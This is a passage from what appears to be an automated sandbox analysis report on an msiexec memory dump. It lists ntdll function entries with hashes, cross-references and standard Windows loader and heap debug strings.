                                            • Instruction Fuzzy Hash: A9619F76911A2CAFDB21DF64CC88B99BBF8AF14714F0102E5E609A7254C7749E80CF90
                                            Function 2484F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 248AE6C6
                                            • HEAP: , xrefs: 248AE6B3
                                            • HEAP[%wZ]: , xrefs: 248AE6A6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: f1329af8ec2146e358bb50f3dd3d997e3636b7b9ff13b018dd49688df7bcb8cc
                                            • Instruction ID: b3993f3c18706c81e106b8bb9d6670e4e4fde3389b5afbd8c6bcb509453745c9
                                            • Opcode Fuzzy Hash: f1329af8ec2146e358bb50f3dd3d997e3636b7b9ff13b018dd49688df7bcb8cc
                                            • Instruction Fuzzy Hash: 3D514E31760648EFE312CBA8C894F56BBF8FF05350F0446A4E692DB692D3B4EA40DB10
                                            Function 248715F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 248BA590
                                            • minkernel\ntdll\ldrmap.c, xrefs: 248BA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 248BA589
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 186aae7b7dbaa8934a50fe0632323e3ad2b4d06d575fa5f0b5e2ec0990521f49
                                            • Instruction ID: 10999348e2907dc2ed2d9fcaad5397fe3a5580a774b6daff04d88b35650ddc95
                                            • Opcode Fuzzy Hash: 186aae7b7dbaa8934a50fe0632323e3ad2b4d06d575fa5f0b5e2ec0990521f49
                                            • Instruction Fuzzy Hash: 7A51F074620745DFE712CB68C9A0B2A7BF4AB00754F144394EA919BBEAD7B4EE40C740
                                            Function 2488C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248C82E8
                                            • Failed to reallocate the system dirs string !, xrefs: 248C82D7
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 248C82DE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 465650dc75f84e8d645e49711fa354f8ca1fce48daf150def73392ccd5ebd611
                                            • Instruction ID: 56fff9ebcf5e0e6791980d4459188222d57ed19f04b581f971201f123784aaa0
                                            • Opcode Fuzzy Hash: 465650dc75f84e8d645e49711fa354f8ca1fce48daf150def73392ccd5ebd611
                                            • Instruction Fuzzy Hash: A141C3B156A304EBD721EB78C844B4B7BE8EF55654F00462AFA44E7259E778D800CB91
                                            Function 2484758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: 070d96c03204774fc56dec8ab1734f96e7facc7e66a1f36933f3451ac81c3b53
                                            • Instruction ID: c4d9aad0dbbfaba31cea42adf33a9009e275e758d8d403334468d0665d6cc64c
                                            • Opcode Fuzzy Hash: 070d96c03204774fc56dec8ab1734f96e7facc7e66a1f36933f3451ac81c3b53
                                            • Instruction Fuzzy Hash: 134166B0B30B98CFEB1ADF5CC090F6A7BE29F05344F1447A9D9458BA46D6B4D886CB11
                                            Function 248816CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpAllocateTls, xrefs: 248C1B40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 248C1B4A
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 248C1B39
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: 8aee1a3856d2b7e54dd61c65846e6bdb5950431394bae61c9a7eeb1ab797a129
                                            • Instruction ID: 169e3006f58649fc08f45497424db8c50b5cd5a87ace512ed4a71ac4593163f4
                                            • Opcode Fuzzy Hash: 8aee1a3856d2b7e54dd61c65846e6bdb5950431394bae61c9a7eeb1ab797a129
                                            • Instruction Fuzzy Hash: 0D417F75A20609DFDB16CFA9C880BADBBF5FF58714F008259E505A7218DBB5A840CF90
                                            Function 248D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 248D4888
                                            • LdrpCheckRedirection, xrefs: 248D488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 248D4899
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: 22a067bdfe872f46fcb48bf8b004f9eca13dad49cb2c0d4dc43522f72ae4db7d
                                            • Instruction ID: 74497c8b7c488b19eb4c4e27df107c6434dcb4e4873dcd6dfbd6a59412dbd563
                                            • Opcode Fuzzy Hash: 22a067bdfe872f46fcb48bf8b004f9eca13dad49cb2c0d4dc43522f72ae4db7d
                                            • Instruction Fuzzy Hash: 87419D33A26694DFCB19CE79C840A167BE5EF89E90F0107A9ED88A7311D731D800DB91
                                            Function 248DB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            • GlobalFlag, xrefs: 248DB68F
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 248DB632
                                            • @, xrefs: 248DB670
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: 438b430401f2f796734938feffa9e8c78bb142d2f29e0922b18a31c7707eb471
                                            • Instruction ID: 0a1aab5efda54b21a01f149dd2008aa4785df9a76652636941ec2a8e7f354f54
                                            • Opcode Fuzzy Hash: 438b430401f2f796734938feffa9e8c78bb142d2f29e0922b18a31c7707eb471
                                            • Instruction Fuzzy Hash: 40312DB2D11219EFEB10DFA9DC90EEEBBB8EF44744F100569E605A7254DB749E00CBA4
                                            Function 24881607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializeTls, xrefs: 248C1A47
                                            • DLL "%wZ" has TLS information at %p, xrefs: 248C1A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 248C1A51
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: f99f58cb535c8db1ce4edb9321df1d6f7d60cfe365d1a0a115509e615625399a
                                            • Instruction ID: ebfa2a0b35940733fdf472242ad645883da9a87006e3d45305385362733e72b0
                                            • Opcode Fuzzy Hash: f99f58cb535c8db1ce4edb9321df1d6f7d60cfe365d1a0a115509e615625399a
                                            • Instruction Fuzzy Hash: EE310471A24208EBE712CB98CC81F7A7AA8EF51365F040359F641B7194EBB4EE40CB90
                                            Function 248CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: ae720158fcd1f5061de8611088ea4fae8bd85cc30fa689098572845e6079031e
                                            • Instruction ID: f558d185bb40ec7399d96ab164788b4e86e780ff6326512bc56c89d824e281d5
                                            • Opcode Fuzzy Hash: ae720158fcd1f5061de8611088ea4fae8bd85cc30fa689098572845e6079031e
                                            • Instruction Fuzzy Hash: E6614B72E20619DFDB19CFA8C880ABDBBB9FB48700F104269E659EB251DB31D900DB50
                                            Function 2486F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$
                                            • API String ID: 0-233714265
                                            • Opcode ID: 640c7611050eb9f94276ff771db5cc40fb4693db877b0539063043ffaca5a89c
                                            • Instruction ID: 475aab84ba9a3b6c615f9dedb13c3f69ce8948b577c341d350736be05b201d8a
                                            • Opcode Fuzzy Hash: 640c7611050eb9f94276ff771db5cc40fb4693db877b0539063043ffaca5a89c
                                            • Instruction Fuzzy Hash: A861CE71E20649DFEB61CFA8C580B9DBBB1FF44704F0042A9D61BAB645DBB4E941DB40
                                            Function 248504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2485063D
                                            • kLsE, xrefs: 24850540
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 1ca7165a70308a05164a7672a5e39ae0a0ac1d86ce171185e7c13e735f148f18
                                            • Instruction ID: 20bce5507571f5fc222d2935c8227574ffe0bdd0f8e2f728f400239fbf89c158
                                            • Opcode Fuzzy Hash: 1ca7165a70308a05164a7672a5e39ae0a0ac1d86ce171185e7c13e735f148f18
                                            • Instruction Fuzzy Hash: 4F51CE71524B46CFC324DF68C440797BBE4AF86304F018A3EEAAA97261E774D645CF92
                                            Function 248E35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 35bb9400b26a499b97407f384b5f183e87feec2dce4476e318161c611acc979f
                                            • Instruction ID: a930537100fca6e2bf5ece548da2de1bf87f87e8ff656d776d52e0db0efae25d
                                            • Opcode Fuzzy Hash: 35bb9400b26a499b97407f384b5f183e87feec2dce4476e318161c611acc979f
                                            • Instruction Fuzzy Hash: AB319031329781DBD301CB78D854B2ABBE4EF96754F000A69F958CB3A0EBB4D905DB52
                                            Function 248834B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 248C2A95
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 248C2A90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: a0c698224e50b68588667cb596313528a889132e9578d91c4ed76a53e019eda4
                                            • Instruction ID: 9ab54fc966d916448252b188c814171facfd6a0631a0691c9a9f4faa0a0b71f8
                                            • Opcode Fuzzy Hash: a0c698224e50b68588667cb596313528a889132e9578d91c4ed76a53e019eda4
                                            • Instruction Fuzzy Hash: 21112C72B21108FBE7258A88DD41F5B7AA99FA4F54F1482697A04DF284D6B5CD40C690
                                            Function 2488A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: 2b358fcfd2d4bc55408fd2859d324942e8517fc5cecf854ba265063064e3e755
                                            • Instruction ID: 32640b9ff75cef636b398c6eef70e8cab8c70e4a1124b1829be89a637f196781
                                            • Opcode Fuzzy Hash: 2b358fcfd2d4bc55408fd2859d324942e8517fc5cecf854ba265063064e3e755
                                            • Instruction Fuzzy Hash: A401ADB2165A48EFE321CF14CD45B167BE8EB44B15F008A39A658C7694E338D804CB4A
                                            Function 2485C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: a3c458c926e6c2c96f5d364e64d94aa46d668c1f7151d5de2c286619712dc3f7
                                            • Instruction ID: b5408cc419ea478b752a5b014fb0d2ebcb05e738a385f796bda9d6db924fd2a7
                                            • Opcode Fuzzy Hash: a3c458c926e6c2c96f5d364e64d94aa46d668c1f7151d5de2c286619712dc3f7
                                            • Instruction Fuzzy Hash: 8A824D75E20218CFDB15CFA9C880B9DBBF1BF48350F1182A9DA59AB261E7749981CF50
                                            Function 2488F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e158dc5e883326af1b228789fc02fbc88621493144f30b0201eff5b10fcda3ef
                                            • Instruction ID: 0885bb71540059b37b6cc9221c7732d05f8b4d5348760cbfeee7dabf2571119c
                                            • Opcode Fuzzy Hash: e158dc5e883326af1b228789fc02fbc88621493144f30b0201eff5b10fcda3ef
                                            • Instruction Fuzzy Hash: 044117B4D15288EFDB11CFA9C480AAEBBF4FF48750F10426EE599A7211D7749940CF60
                                            Function 248D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: bb7f8bbda5d5055d90013de2042d6af498c3e3b4bca3f7e82e4b08e06bc2b6d2
                                            • Instruction ID: 9120fc60a5e9aaf86851a930c560ce85f5fa9677f5b469e80e337a44c6d95f29
                                            • Opcode Fuzzy Hash: bb7f8bbda5d5055d90013de2042d6af498c3e3b4bca3f7e82e4b08e06bc2b6d2
                                            • Instruction Fuzzy Hash: 81916472A51219EFEB11CBA9DC55FAE7BB8EF18B50F100165F600BB194D7B4AD00CB61
                                            Function 2488A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 775379a9ce86349242a80727b96c90e708438402be88e7113fd9b66c214a631b
                                            • Instruction ID: bb9b36728e120543d4a00821d5450f58bc288f9267585450edd65e7ebccde597
                                            • Opcode Fuzzy Hash: 775379a9ce86349242a80727b96c90e708438402be88e7113fd9b66c214a631b
                                            • Instruction Fuzzy Hash: C5716A75E2020ADFDB18CF98C990A9DBBB1FF48B10F14867AE905B7245E774D901CB60
                                            Function 2485973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction ID: a2efb3b4612ac75614547bc955832300b3706571769e1fa6559eeefb6dd4e8d4
                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction Fuzzy Hash: A0616971D2121DEFDB11CFA9C844B9EBBB4FF84710F1146A9E910AB2A4D7749A00DBA1
                                            Function 248DF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction ID: bc5b8aefa7bbf151f9308c2a26fc8dcb36c5946fd49c0eceb74472fa22ee0011
                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction Fuzzy Hash: 7F51AF72626705FFE7128F68C840F5BB7E8FB84754F000A29BA419B294D7B4DD04DB92
                                            Function 2486E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: d830f92e66036f501d7cd9fa7c5fd445c0fdea32075541da082d25e6f7a9885d
                                            • Instruction ID: 19258de0f3164c69001738c45e8e06ae050f4c3cb977c01be581667958217b90
                                            • Opcode Fuzzy Hash: d830f92e66036f501d7cd9fa7c5fd445c0fdea32075541da082d25e6f7a9885d
                                            • Instruction Fuzzy Hash: 5B418072529341DBE751DB75C880B6BBBE8AF98604F000B2DFA86D7140E774CA04C793
                                            Function 248CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
